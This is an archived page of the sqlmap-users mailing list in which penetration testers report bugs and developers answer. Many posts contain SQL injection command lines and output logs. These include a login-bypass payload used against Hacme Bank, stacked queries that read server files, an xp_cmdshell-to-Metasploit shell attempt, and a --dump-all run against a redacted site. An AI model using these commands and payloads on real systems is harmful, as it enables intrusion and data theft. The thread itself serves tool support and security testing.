sqlmap-users Mailing List for sqlmap (Page 137)
From: Ryan D. <rya...@gm...> - 2009-07-14 12:47:47
2009/7/14 Andres Riancho <and...@gm...>:
> Ryan,
>
> On Tue, Jul 14, 2009 at 9:21 AM, Ryan Dewhurst<rya...@gm...> wrote:
>> Hello,
>> While trying to run SQLMap on Windows Vista (PE version) I get the
>> following error:
>>
>> C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC
>> --auth-cred=user:password@ -u
>> http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
>> Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1
>
> You should use quotes around the URL:
>
> sqlmap.exe --auth-type=BASIC --auth-cred=user:password@ -u
> "http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInputName=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1"
>
> At least that will work on Linux.

Aye that worked! Thanks Andres.

>> sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
>> and Daniele Bellucci <dan...@gm...>
>>
>> [*] starting at: 13:13:10
>>
>> [13:13:10] [INFO] testing connection to the target url
>> [13:13:13] [INFO] testing if the url is stable, wait a few seconds
>> [13:13:18] [INFO] url is stable
>> [13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
>> [13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> [13:13:21] [INFO] testing if Cookie parameter
>> 'MIPHPF_SESSION-1631451101' is dynamic
>> [13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
>> [13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
>> [13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic
>>
>> [*] shutting down at: 13:13:27
>>
>> 'RatingActionInputName' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductReviewText' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductRatingVoteValue' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'action' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductID' is not recognized as an internal or external command,
>> operable program or batch file.
>>
>> Any help much appreciated.
>>
>> Ryan
>
> --
> Andrés Riancho
> Founder, Bonsai - Information Security
> http://www.bonsai-sec.com/
> http://w3af.sf.net/

From: Andres R. <and...@gm...> - 2009-07-14 12:45:39
Ryan,

On Tue, Jul 14, 2009 at 9:21 AM, Ryan Dewhurst<rya...@gm...> wrote:
> Hello,
> While trying to run SQLMap on Windows Vista (PE version) I get the
> following error:
>
> C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC
> --auth-cred=user:password@ -u
> http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
> Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1

You should use quotes around the URL:

sqlmap.exe --auth-type=BASIC --auth-cred=user:password@ -u "http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInputName=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1"

At least that will work on Linux.

> sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
> and Daniele Bellucci <dan...@gm...>
>
> [*] starting at: 13:13:10
>
> [13:13:10] [INFO] testing connection to the target url
> [13:13:13] [INFO] testing if the url is stable, wait a few seconds
> [13:13:18] [INFO] url is stable
> [13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [13:13:21] [INFO] testing if Cookie parameter
> 'MIPHPF_SESSION-1631451101' is dynamic
> [13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
> [13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
> [13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic
>
> [*] shutting down at: 13:13:27
>
> 'RatingActionInputName' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductReviewText' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductRatingVoteValue' is not recognized as an internal or external command,
> operable program or batch file.
> 'action' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductID' is not recognized as an internal or external command,
> operable program or batch file.
>
> Any help much appreciated.
>
> Ryan

--
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/

From: Ryan D. <rya...@gm...> - 2009-07-14 12:21:37
Hello,
While trying to run SQLMap on Windows Vista (PE version) I get the following error:

C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC --auth-cred=user:password@ -u
http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1

sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 13:13:10

[13:13:10] [INFO] testing connection to the target url
[13:13:13] [INFO] testing if the url is stable, wait a few seconds
[13:13:18] [INFO] url is stable
[13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[13:13:21] [INFO] testing if Cookie parameter 'MIPHPF_SESSION-1631451101' is dynamic
[13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
[13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
[13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic

[*] shutting down at: 13:13:27

'RatingActionInputName' is not recognized as an internal or external command,
operable program or batch file.
'ProductReviewText' is not recognized as an internal or external command,
operable program or batch file.
'ProductRatingVoteValue' is not recognized as an internal or external command,
operable program or batch file.
'action' is not recognized as an internal or external command,
operable program or batch file.
'ProductID' is not recognized as an internal or external command,
operable program or batch file.

Any help much appreciated.

Ryan

From: Bryan M. <br...@sy...> - 2009-07-13 18:59:17
I recently downloaded the latest version of sqlmap and ran it against a known database. I had previously run Scrawlr against the database and it detected a "verbose" SQL Injection issue. It told me the database was MS SQL and it enumerated the database names. I ran the sqlmap tool and it told me there was a "LIKE" SQL Injection issue but couldn't detect the database type. Am I doing something wrong? Unfortunately I don't know the exact version of the MS SQL database to know if it's supported.

From: Bernardo D. A. G. <ber...@gm...> - 2009-07-09 11:50:31
Hi Patrick,

On Thu, Jul 9, 2009 at 09:28, Patrick Webster<pa...@au...> wrote:
> ./sqlmap.py -v 2 -u target --read-file "C:\boot.ini" --dbms "Microsoft
> SQL Server"

Apparently boot.ini is not in all the Windows systems, give a try to C:\globdata.ini, C:\install.ini or any other default file within C:\WINDOWS.

> ...
> File "/home/patrick/sqlmap/plugins/generic/filesystem.py", line 315,
> in readFile
> rFilePath = dataToOutFile(fileContent)
> File "/home/patrick/sqlmap/lib/core/common.py", line 342, in dataToOutFile
> rFileFP.write(data)
> TypeError: argument 1 must be string or read-only buffer, not list

Thanks for reporting. Fixed and committed.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

From: Patrick W. <pa...@au...> - 2009-07-09 08:53:23
./sqlmap.py -v 2 -u target --read-file "C:\boot.ini" --dbms "Microsoft SQL Server"

sqlmap/0.7rc3
by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 18:26:09

[18:26:09] [DEBUG] initializing the configuration
[18:26:09] [DEBUG] initializing the knowledge base
[18:26:09] [DEBUG] cleaning up configuration parameters
[18:26:09] [DEBUG] setting the HTTP timeout
[18:26:09] [DEBUG] setting the HTTP method to GET
[18:26:09] [DEBUG] forcing back-end DBMS to user defined value
[18:26:09] [DEBUG] creating HTTP requests opener object
[18:26:09] [DEBUG] parsing XML queries file
[18:26:09] [INFO] testing connection to the target url
[18:26:10] [INFO] testing if the url is stable, wait a few seconds
[18:26:11] [INFO] url is stable
[18:26:11] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[18:26:12] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[18:26:12] [INFO] testing if GET parameter 'id' is dynamic
[18:26:13] [DEBUG] setting match ratio to default value 0.900
[18:26:13] [INFO] confirming that GET parameter 'id' is dynamic
[18:26:13] [INFO] GET parameter 'id' is dynamic
[18:26:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[18:26:13] [INFO] testing unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[18:26:14] [INFO] testing for parenthesis on injectable parameter
[18:26:15] [INFO] the injectable parameter requires 0 parenthesis
[18:26:15] [DEBUG] skipping test for MySQL
[18:26:15] [DEBUG] skipping test for Oracle
[18:26:15] [DEBUG] skipping test for PostgreSQL
[18:26:15] [INFO] testing Microsoft SQL Server
[18:26:15] [INFO] confirming Microsoft SQL Server
[18:26:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

[18:26:16] [INFO] testing stacked queries support on parameter 'id'
[18:26:16] [DEBUG] query: WAITFOR DELAY '0:0:5'
[18:26:21] [INFO] the web application supports stacked queries on parameter 'id'
[18:26:21] [DEBUG] going to read the file with stacked query SQL injection technique
[18:26:21] [INFO] fetching file: 'C:/boot.ini'
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfile
[18:26:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:22] [DEBUG] query: CREATE TABLE sqlmapfilehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))
[18:26:22] [DEBUG] loading the content of file 'C:/boot.ini' into support table
[18:26:22] [DEBUG] query: BULK INSERT sqlmapfile FROM 'C:/boot.ini' WITH (CODEPAGE='RAW', FIELDTERMINATOR='PXrRMcjmNR', ROWTERMINATOR='EHMuHbObaJ')
[18:26:22] [DEBUG] query: SELECT ISNULL(CAST(COUNT(data) AS VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex
[18:26:22] [INFO] retrieved: 1
[18:26:24] [DEBUG] performed 6 queries in 2 seconds
[18:26:24] [DEBUG] query: SELECT TOP 1 ISNULL(CAST(data AS VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex WHERE data NOT IN (SELECT TOP 0 data FROM sqlmapfilehex ORDER BY id ASC) ORDER BY id ASC
[18:26:24] [INFO] retrieved:
[18:26:26] [DEBUG] performed 4 queries in 1 seconds
[18:26:26] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:26] [ERROR] for some reasons sqlmap retrieved an odd-length hexadecimal string which it is not able to convert to raw string
[18:26:26] [ERROR] unhandled exception in sqlmap/0.7rc3, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7rc3
Python version: 2.4.3
Operating system: linux2

Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/patrick/skychannel/sqlmap/lib/controller/controller.py", line 263, in start
  File "/home/patrick/skychannel/sqlmap/lib/controller/action.py", line 130, in action
  File "/home/patrick/sqlmap/plugins/generic/filesystem.py", line 315, in readFile
    rFilePath = dataToOutFile(fileContent)
  File "/home/patrick/sqlmap/lib/core/common.py", line 342, in dataToOutFile
    rFileFP.write(data)
TypeError: argument 1 must be string or read-only buffer, not list

[*] shutting down at: 18:26:26

From: Giorgio F. <gio...@gm...> - 2009-07-09 07:00:07
Hi Richard,

as far as I remember, Hackme Bank login page replies to the user with a temporary redirect. Sqlmap will see the same answer from both the false and the true injection. Btw the reason why sqlmap may not work is that it does not follow the 302 redirect to the new location specified in the response.

Having sqlmap working with Hackme Bank would be very useful for training purposes; hope to be helpful in the solution of the problem.

Giorgio

2009/6/18 Richard Jones <wp...@gm...>:
> Hi all,
>
> Sorry this ended up so long.....I wanted to fully explain my situation :)
>
> I've been playing with sqlmap against Foundstone's Hacme Bank and have been
> making some progress.
>
> Here is the command I've come up with:
>
> ./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx"
> --method=POST -p "txtUserName"
> --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
> Admin=false"
> --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit"
> -v 5 --prefix="'" --postfix=" OR 1=1--" --batch
>
> I can confirm that this command is able to gain access to the HacmeBank site
> with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of
> course). Some other crafted strings from sqlmap are successful as well.
>
> BUT, sqlmap doesn't seem to detect that it is successful in gaining access.
> I think the problem exists in the --regexp string.....as in I can't find a
> regexp that works....
>
> From the sqlmap docs, --regexp lets the user "provide a string which is
> always present on the not injected page and on all True injected query
> pages, but that it is not on the False ones". The problem I think I am
> running into is finding a string that is present on the not injected page,
> but not on the false pages.
>
> The strings that I have been trying to match are:
> Not Injected Page: Message"></span>
> True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
> False Injected Page: Message">Invalid Login</span>
>
> My question is how is the "not injected" page detected? When watching the
> output on level 5 verbosity, I see this request. I assume this is the
> request to determine the "Not Injected" page?
>
> [11:42:28] [INFO] testing if the provided regular expression matches within
> the target URL page content
> [11:42:30] [TRAFFIC OUT] HTTP request:
> POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
> Content-length: 105
> Accept-language: en-us,en;q=0.5
> Connection: Keep-Alive
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 192.168.200.11:80
> Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
> Admin=false
> Content-type: application/x-www-form-urlencoded
> __VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit
>
> This request sends in the POST data that I provided at the command line.
> This data causes an "Invalid Login" from the login page, which is exactly
> what happens when a False injected query occurs as well. In fact, the HTML
> that comes back from this "Not Injected" request is identical to the HTML
> that comes back from a False injected page.
>
> So, in this situation, I feel that sqlmap isn't requesting the "Not
> Injected" page correctly. In my mind, that would involve a GET request,
> with no login data, to login.aspx, not a POST to that page. The GET should
> return a page that doesn't have the "Invalid Login" text that gets returned
> to a POST with invalid credentials.
>
> So, can I get sqlmap to detect the "Not Injected" page with a simple GET
> request, but then perform the sql injection using POST requests? Or is
> there something else that needs done? I tried changing --method to GET, as
> well as removing --method, but the GET that is sent for the "Not Injected"
> page still contains the POST data, which still results in "Invalid Login".
>
> Or am I confused on how this should work?
>
> Thanks!
>
> Richard

From: Bernardo D. A. G. <ber...@gm...> - 2009-07-06 14:41:18
Fixed and committed. Thanks for reporting.

On Mon, Jul 6, 2009 at 15:11, Simon Baker<Si...@se...> wrote:
> ...
> chunkName = self.updateBinChunk(wFileChunk, dFile, tmpPath)
>
> TypeError: updateBinChunk() takes exactly 3 arguments (4 given)

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

From: Simon B. <Si...@se...> - 2009-07-06 14:25:44
Hi Guys,

Seems there's an error with the arguments being passed when trying to utilise metasploit to spawn a shell or similar. There's also an error in the messages displayed when the user is entering parameters too, something's getting screwy somewhere :(

S.

Snip....

[15:04:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2005

[15:04:30] [INFO] testing stacked queries support on parameter 'cat1'
[15:04:40] [INFO] the web application supports stacked queries on parameter 'cat1'
[15:04:40] [INFO] testing if current user is DBA
[15:04:40] [INFO] retrieved: 1
[15:04:43] [INFO] checking if xp_cmdshell extended procedure is available, wait..
[15:04:55] [INFO] xp_cmdshell extended procedure is available
[15:04:55] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Bind TCP (default)
o NX)ind TCP (N
[3] Reverse TCP
[4] Reverse TCP (No NX)
> 1
which is the back-end DBMS address? [172.31.1.6]
which remote port numer do you want to use? [23986]
which payload do you want to use?
[1] Reflective Meterpreter (default)
preterter
[3] Shell
[4] Reflective VNC
[5] VNC
> 5
[15:05:36] [WARNING] it is unlikely that the VNC injection will be successful because often Microsoft SQL Server 2005 runs as Network Service or the Administrator is not logged in
what do you want to do?
[1] Give it a try anyway
erpreter payload (default)e Met
[3] Fall back to Shell payload
> 1
do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its argument so that it will be started as SYSTEM? [Y/n]
[15:06:07] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into chunks, upload them and recreate the original file out of the binary chunks server-side, wait..
[15:06:07] [ERROR] unhandled exception in sqlmap/0.7rc3, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7rc3
Python version: 2.5.1
Operating system: darwin

Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/Users/simonbaker/tools/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/Users/simonbaker/tools/sqlmap/lib/controller/action.py", line 143, in action
    conf.dbmsHandler.osPwn()
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/takeover.py", line 312, in osPwn
    self.createMsfPayloadStager()
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 603, in createMsfPayloadStager
    self.__prepareIngredients()
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 330, in __prepareIngredients
    self.payloadStr = self.__selectPayload(askChurrasco)
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 263, in __selectPayload
    uploaded = self.uploadChurrasco()
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/takeover.py", line 263, in uploadChurrasco
    self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/filesystem.py", line 338, in writeFile
    self.stackedWriteFile(wFile, dFile, fileType, confirm)
  File "/Users/simonbaker/tools/sqlmap/plugins/dbms/mssqlserver.py", line 544, in stackedWriteFile
    chunkName = self.updateBinChunk(wFileChunk, dFile, tmpPath)
TypeError: updateBinChunk() takes exactly 3 arguments (4 given)

[*] shutting down at: 15:06:07

Simon Baker
Penetration Tester
Sec-1 Ltd
T: 0113 2578955
F: 0113 2579718

From: Bernardo D. A. G. <ber...@gm...> - 2009-06-24 21:58:17
---------- Forwarded message ----------
From: sql pirate <sql...@go...>
Date: Wed, Jun 24, 2009 at 21:59
Subject: Re: [sqlmap-users] sqlmap error
To: "Bernardo Damele A. G." <ber...@gm...>

Hi Bernardo,

thanks for your help. Your tool works now for this vulnerability! Though I have some other restrictions from the application now which prevent me from extracting data :-(

Cheers,
Jan

2009/6/24 Bernardo Damele A. G. <ber...@gm...>
>
> Hi,
>
> On Mon, Jun 22, 2009 at 14:03, sql pirate<sql...@go...> wrote:
> > ...
> > ./sqlmap.py -u
> > "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1"
> > -p FLD_listInstancesOrderBy --string=rowHighSmall
> > --proxy=http://127.0.0.1:8080/
> > --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg"
> > --delay=1 --prefix="%2b(select%20case%20when%201=1"
> > --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select
> > 'bla' from dual"
> > ...
> > forgedPayload = payload % (expressionUnescaped, idx, limit)
> > ValueError: unsupported format character 'b' (0x62) at index 104
> > ...
>
> Use latest sqlmap from subversion repository.
> Avoid uri encoding in --prefix and --postfix options' value. sqlmap
> uri encode the HTTP request parameters properly automatically.
>
> Cheers,
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobiles: +447788962949 (UK), +393493821385 (IT)
> PGP Key ID: 0x05F5A30F

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2009-06-24 14:18:04
Hi Daniel,

On Tue, Jun 23, 2009 at 23:49, Daniel Hückmann<san...@gm...> wrote:
> This occurred when resuming a session I was working on last night.
>
> After rerunning the same command without --eta it continued successfully.
>
> ./sqlmap.py -u http://www.[REMOVED].com/[REMOVED]/page.php?value=1 -s
> youlosethegame --dump-all --eta
> ...
> File "/home/sbit/Workspace/sqlmap/lib/core/progress.py", line 39, in
> __init__
> self.__max = int(maxValue)
> ValueError: invalid literal for int() with base 10: ''
> ...

It should be fixed now, otherwise get back to me with the session file obfuscated where needed.
Thanks for reporting this bug.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2009-06-24 14:12:46
Hi,

On Mon, Jun 22, 2009 at 14:03, sql pirate<sql...@go...> wrote:
> ...
> ./sqlmap.py -u
> "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1"
> -p FLD_listInstancesOrderBy --string=rowHighSmall
> --proxy=http://127.0.0.1:8080/
> --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg"
> --delay=1 --prefix="%2b(select%20case%20when%201=1"
> --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select
> 'bla' from dual"
> ...
> forgedPayload = payload % (expressionUnescaped, idx, limit)
> ValueError: unsupported format character 'b' (0x62) at index 104
> ...

Use latest sqlmap from subversion repository.
Avoid uri encoding in --prefix and --postfix options' value. sqlmap uri encodes the HTTP request parameters properly automatically.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

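Why the pre-encoded --prefix value in the message above ends in that ValueError, shown as an added example that is not sqlmap's code and not part of the thread: `%2b` inside a string that is later used with Python's `%` operator is parsed as a conversion specifier (width 2, type `b`), and a value that survives formatting would then be URI-encoded a second time. `TEMPLATE_TAIL` and all function names are assumptions made for illustration; only the prefix string and the three-value tuple come from the quoted command and traceback.

```python
from urllib.parse import quote, unquote

# Value of the --prefix option quoted in the message above (already URI-encoded).
PRE_ENCODED_PREFIX = "%2b(select%20case%20when%201=1"
# The same text with the encoding undone, which is what the reply says to pass.
RAW_PREFIX = unquote(PRE_ENCODED_PREFIX)  # "+(select case when 1=1"

# Hypothetical template tail with three placeholders, mirroring the
# three-value tuple in the traceback line `payload % (...)`.
TEMPLATE_TAIL = " expr=%s idx=%d limit=%d"


def format_naive(prefix, expression, idx, limit):
    """Paste user text into a %-format string, then interpolate."""
    return (prefix + TEMPLATE_TAIL) % (expression, idx, limit)


def format_escaped(prefix, expression, idx, limit):
    """Same interpolation, but '%' in the user text is doubled first."""
    return (prefix.replace("%", "%%") + TEMPLATE_TAIL) % (expression, idx, limit)


def naive_error(prefix):
    """Return the ValueError message the naive path raises, or None."""
    try:
        format_naive(prefix, "x", 1, 64)
    except ValueError as exc:
        return str(exc)
    return None


def encode_once(text):
    """URI-encode a finished parameter value exactly once."""
    return quote(text, safe="")


def server_view(text):
    """What a server sees after decoding a value that was encoded once."""
    return unquote(encode_once(text))


if __name__ == "__main__":
    print("naive, pre-encoded :", naive_error(PRE_ENCODED_PREFIX))
    print("naive, raw         :", format_naive(RAW_PREFIX, "x", 1, 64))
    print("escaped            :", format_escaped(PRE_ENCODED_PREFIX, "x", 1, 64))
    print("raw on the wire    :", encode_once(RAW_PREFIX))
    print("pre-enc on the wire:", encode_once(PRE_ENCODED_PREFIX))
    print("server decodes to  :", server_view(PRE_ENCODED_PREFIX))
```

Escaping `%` only removes the crash; the pre-encoded value still reaches the server as the literal text `%2b...` because the request layer encodes it again, which is why the unencoded form is the one to pass.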
From: Bernardo D. A. G. <ber...@gm...> - 2009-06-24 12:06:25
Hi Richard,

On Tue, Jun 23, 2009 at 21:02, Richard Jones<wp...@gm...> wrote:
> ...
> The strings that I have been trying to match are:
> Not Injected Page: Message"></span>
> True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
> False Injected Page: Message">Invalid Login</span>
>
> My question is how is the "not injected" page detected? When watching the
> output on level 5 verbosity, I see this request. I assume this is the
> request to determine the "Not Injected" page?

First of all, sqlmap has no good support for SQL injection in login forms yet. I have to refactor the engine to improve the comparison algorithm to make it properly detect injection points in login forms where, usually, the not injected (original) page differs from both True/False pages and the match is to be done on the True injected page only. I will be working on this in the long run.

This said, if you are sure that the True injection page has only that string to match on, use --string "Line 1", but still, it won't work because at this time sqlmap needs to have the string also in the Not injected page.

> ...
> So, can I get sqlmap to detect the "Not Injected" page with a simple GET
> request, but then perform the sql injection using POST requests? Or is
> there something else that needs done? I tried changing --method to GET, as
> well as removing --method, but the GET that is sent for the "Not Injected"
> page still contains the POST data, which still results in "Invalid Login".

Unfortunately not at this time. I will work on it as time permits.
Thanks for reporting.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

From: Daniel H. <san...@gm...> - 2009-06-23 22:49:39
This occurred when resuming a session I was working on last night.

After rerunning the same command without --eta it continued successfully.

./sqlmap.py -u http://www.[REMOVED].com/[REMOVED]/page.php?value=1 -s youlosethegame --dump-all --eta

Linux odin 2.6.28-13-generic #44-Ubuntu SMP Tue Jun 2 07:57:31 UTC 2009 i686 GNU/Linux

sqlmap version: 0.7rc3
Python version: 2.6.2
Operating system: linux2

Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/sbit/Workspace/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/home/sbit/Workspace/sqlmap/lib/controller/action.py", line 120, in action
    conf.dbmsHandler.dumpAll()
  File "/home/sbit/Workspace/sqlmap/plugins/generic/enumeration.py", line 1091, in dumpAll
    data = self.dumpTable()
  File "/home/sbit/Workspace/sqlmap/plugins/generic/enumeration.py", line 1031, in dumpTable
    value = inject.getValue(query, inband=False)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 378, in getValue
    value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 308, in __goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 99, in __goInferenceFields
    output = __goInference(payload, expressionReplaced, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 58, in __goInference
    count, value = bisection(payload, expression, length, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/techniques/blind/inference.py", line 81, in bisection
    progress = ProgressBar(maxValue=length)
  File "/home/sbit/Workspace/sqlmap/lib/core/progress.py", line 39, in __init__
    self.__max = int(maxValue)
ValueError: invalid literal for int() with base 10: ''

From: Richard J. <wp...@gm...> - 2009-06-23 20:02:31
|
Hi all,

I've been playing with sqlmap against Foundstone's Hacme Bank and have been making some progress. Here is the command I've come up with:

./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx" --method=POST -p "txtUserName" --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false" --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit" -v 5 --prefix="'" --postfix=" OR 1=1--" --batch

I can confirm that this command is able to gain access to the HacmeBank site with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of course). Some other crafted strings from sqlmap are successful as well.

BUT, sqlmap doesn't seem to detect that it is successful in gaining access. I think the problem exists in the --regexp string.....as in I can't find a regexp that works....

From the sqlmap docs, --regexp lets the user "provide a string which is *always* present on the not injected page *and* on all True injected query pages, but that it is *not* on the False ones".

The problem I think I am running into is finding a string that is present on the not injected page, but not on the false pages. The strings that I have been trying to match are:

Not Injected Page: Message"></span>
True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
False Injected Page: Message">Invalid Login</span>

My question is how is the "not injected" page detected? When watching the output on level 5 verbosity, I see this request. I assume this is the request to determine the "Not Injected" page?

[11:42:28] [INFO] testing if the provided regular expression matches within the target URL page content
[11:42:30] [TRAFFIC OUT] HTTP request:
POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Content-length: 105
Accept-language: en-us,en;q=0.5
Connection: Keep-Alive
